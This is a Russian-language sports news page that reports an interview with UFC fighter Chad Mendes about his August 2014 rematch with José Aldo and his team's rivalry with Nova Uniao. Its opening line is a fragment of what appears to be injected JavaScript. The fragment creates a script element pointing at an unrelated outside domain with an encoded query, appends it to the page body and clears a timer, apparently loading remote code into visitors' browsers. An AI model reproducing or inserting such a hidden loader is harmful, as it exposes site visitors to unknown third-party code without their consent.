: script.src = 'http://mvjrx.street-on-which.info' + '/?564803=N343MWUhKid-cXR0dHM'; w.document.body.appendChild(script); clearInterval(i);
 

Чад Мендес: Nova Uniao и Team Alpha Male это две лучшие команды легких весов в мире

понедельник, 16 июня 2014 г.




Претендент на пояс чемпиона UFC в полулегкой весовой категории Чад Мендес в августе второй раз встретится с чемпионом Хосе Альдо, первая встреча с которым завершилась на последней секунде первого раунда от удара коленом в голову. В новом бою Мендес не допустит прежних ошибок, рассказал он в интервью mmafightcorner.com.

О первом поединке с Альдо:
«Пересмотрите поединок, я чувствовал, что побеждаю в бою. Я чаще попадал и оказывал непрерывное давление. Я даже повалил его в партер, несмотря на то, что он схватился за сетку. Оставалась пара секунд, помню, что посмотрел на часы, и позволил ему выбраться, чем он и воспользоваться, нанеся удар коленом. Это была моя ошибка. Я помню хорошо этот момент и часто его вспоминаю. Никогда не допущу подобного».

Об ударных навыках:
«Я давно работаю над этими навыками. Последний год у нас в команде тренером работал Дуэйн Людвиг, это первый в команде Team Alpha Male главный тренер. Это его заслуга и моя, потому что я много отдал сил, чтобы развиваться в качестве бойца. Я горжусь своим прогрессом, тем, что мне стало комфортно в октагоне. Только в последних нескольких боях все навыки начали работать вместе. Мне стало комфортно в бою, я теперь знаю, что попади я по сопернику в этих тонких перчатках, он уйдет в нокаут».

О напарнике и новом чемпионе в легчайшей весовой категории Ти Джей Диллашоу:
«Когда он к нам пришел, он был чистым борцом. Меня очень вдохновила его работа в зале, его усердие и завоевание пояса чемпионом».

О противостоянии команды Nova Uniao и Team Alpha Male:
«Я считаю, что мы две лучшие команды легких весов в мире. Мы продолжит встречаться в боях друг с другом, сражаться за пояс. Соперничество между нами явно присутствует. Есть разговоры о неуважении с обеих сторон, но это свойственно спорту».

О реванше:
«В целом я чувствую себя гораздо лучше, чем в первом бою. Я вырос и как боец и как личность. Все мои навыки существенно улучшились. Я нарастил немного мышечной массы и стал немного больше. В целом чувствую себя новым и улучшенным Чадом Мендесом. Так что я воодушевлен поединком с Альдо, который пройдет 2 августа. Я искренне верю, что настало мое время. Настало время мне носить пояс и отсчитывать серию защит титула».

Спонсор №1

SEO sprint - Всё для максимальной раскрутки!

Спонсор №2

Спонсор №3